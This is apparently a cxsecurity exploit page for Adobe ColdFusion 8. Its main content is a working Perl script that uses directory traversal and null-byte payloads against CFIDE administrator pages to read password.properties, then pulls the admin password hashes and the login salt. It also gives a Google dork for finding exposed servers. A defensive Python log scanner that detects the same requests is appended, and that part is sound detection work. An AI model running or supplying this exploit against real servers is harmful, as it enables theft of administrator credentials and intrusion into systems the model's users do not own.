Adobe ColdFusion Locale File Disclosure exploit *youtube

2013.08.01
Credit: D35m0nd142
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/perl
# ColdFusion Locale File Disclosure exploit (without Metasploit)
# Google Dork: intitle:"Index of /CFIDE/" administrator
# Date: 30/07/2013
# Vendor Homepage: http://www.adobe.com/
# Author: D35m0nd142
# Tested on: Adobe ColdFusion 8 (using Backbox Linux operating system)

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;

my $agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02');

my $target = $ARGV[0];

system("clear");
print "+--------------------------------------------------------+\n";
print "         ColdFusion Locale File Disclosure exploit        \n";
print "                  created by D35m0nd142                   \n";
print "+--------------------------------------------------------+\n";
sleep 1;

if (!defined $target || $target eq '') {
    print "Usage: perl cfexploit.pl <target>\n";
    exit(1);
}

# Prepend the scheme when the user passes a bare host name.
if ($target !~ /http:\/\//) {
    $target = "http://$target";
}

# Candidate URLs: each one feeds a directory-traversal path followed by a
# null byte (%00) to the locale parameter of a CFIDE administrator page, so
# that the server reads password.properties instead of a locale file.
my @hosts = (
    "$target/CFIDE/administrator/index.cfm?locale=../../../../../../ColdFusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/index.cfm?locale=../../../../../../../ColdFusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/index.cfm?locale=../../../../../../../../ColdFusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/index.cfm?locale=../../../../../../../../../ColdFusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
    "$target/CFIDE/wizards/common/_logintowizard.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en",
    "$target/CFIDE/wizards/common/_logintowizard.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/archives/index.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/archives/index.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/entman/index.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/entman/index.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
    "$target/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../JRun4/servers/cfusion/cfusion-ear/cfusion-war/WEB-INF/cfusion/lib/password.properties%00en",
);

print "\n... Exploiting ... \n";

foreach my $host (@hosts) {
    my $req = $agent->request(HTTP::Request->new(GET => $host));

    # A hit is a successful response that carries rdspassword= and none of
    # the usual error-page strings.
    if ($req->is_success
        && $req->content !~ /Not Found/
        && $req->content !~ /Page not found/
        && $req->content !~ /Forbidden/
        && $req->content =~ /rdspassword=/) {

        print "\n[+] Vulnerable URL: $host \n\n";

        # Save the raw response so the shell one-liners below can work on it.
        open(my $fh, '>', 'cf_content.txt') or die "cannot write cf_content.txt: $!";
        print $fh $req->content;
        close($fh);

        # Extract the password= lines from the disclosed properties file.
        my $grep = "grep 'password=' cf_content.txt > passwords.txt";
        my $head = "head -n 2 passwords.txt";
        system($grep);
        print "+-------------------------------------------------+\n";
        print "             [+] ColdFusion passwords:             \n";
        print "___________________________________________________\n";
        system($head);
        print "___________________________________________________\n";
        sleep 1;

        print "\n... Retrieving SALT ... \n\n";
        sleep 1;

        # The login page embeds the salt in a hidden input; cut out its value.
        $grep = "grep '<input name=\"salt\" type=\"hidden\" value=' cf_content.txt > cf_salt.txt";
        my $salt_cut  = "cut -d '=' -f 4 cf_salt.txt > cf_salt1.txt";
        my $salt_cut1 = "cut -d '\"' -f 2 cf_salt1.txt > cf_salt2.txt";
        system($grep);
        system($salt_cut);
        system($salt_cut1);
        print "+---------------------------+";
        print "\n         [+] SALT:         \n";
        print "_____________________________\n";
        system("cat cf_salt2.txt");
        print "_____________________________\n";
        sleep(1.3);
        exit(0);
    } else {
        # Record the miss and move on to the next candidate URL.
        open(my $fh, '>>', 'cf_content.txt') or die "cannot write cf_content.txt: $!";
        print $fh "[-] not vulnerable!";
        close($fh);
    }
}
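A defender-side companion to the script above, added here and not part of the original advisory: a small Python scanner that flags the request pattern the exploit sends (a /CFIDE/ page whose locale parameter carries ../ traversal, a %00 null byte, or a reference to password.properties) in web-server access logs, including the double-encoded variant. The log lines and IP addresses are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log samples (not from the page): lines 1-2 mimic the
# exploit's locale requests (line 2 double-encoded), lines 3-4 are benign or unrelated.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Jul/2013:10:01:02 +0000] "GET /CFIDE/administrator/index.cfm?locale=../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Jul/2013:10:01:03 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%2F..%2F..%2Fopt%2Fcoldfusion8%2Flib%2Fpassword.properties%2500en HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Jul/2013:10:02:00 +0000] "GET /CFIDE/administrator/index.cfm?locale=en HTTP/1.1" 200 6000 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Jul/2013:10:02:05 +0000] "GET /index.cfm?page=../../etc/passwd HTTP/1.1" 404 300 "-" "curl/7.30"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded %2500 / %252e still surface."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def locale_reasons(value):
    """Explain why a decoded locale value matches the disclosure pattern; [] if benign."""
    reasons = []
    if "../" in value or "..\\" in value:
        reasons.append("path traversal")
    if "\x00" in value:
        reasons.append("null-byte truncation")
    if "password.properties" in value.lower():
        reasons.append("targets password.properties")
    return reasons

def scan_log(text):
    """Flag /CFIDE/ requests whose locale parameter carries traversal or null-byte tricks.
    parse_qs decodes one percent-encoding layer; fully_unquote peels any remaining ones."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        if not parts.path.lower().startswith("/cfide/"):
            continue
        for raw in parse_qs(parts.query, keep_blank_values=True).get("locale", []):
            decoded = fully_unquote(raw)
            reasons = locale_reasons(decoded)
            if reasons:
                findings.append({"ip": m.group("ip"), "status": m.group("status"), "path": parts.path, "locale": decoded, "reasons": reasons})
    return findings
```

Feed real access logs to scan_log and treat any finding with a 200 status as a likely successful disclosure, since the exploit only reports success when the response body comes back with rdspassword=.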

References:

http://www.youtube.com/watch?v=ophoUX0ePIc
https://cxsecurity.com/issue/WLB-2013050065


Copyright 2024, cxsecurity.com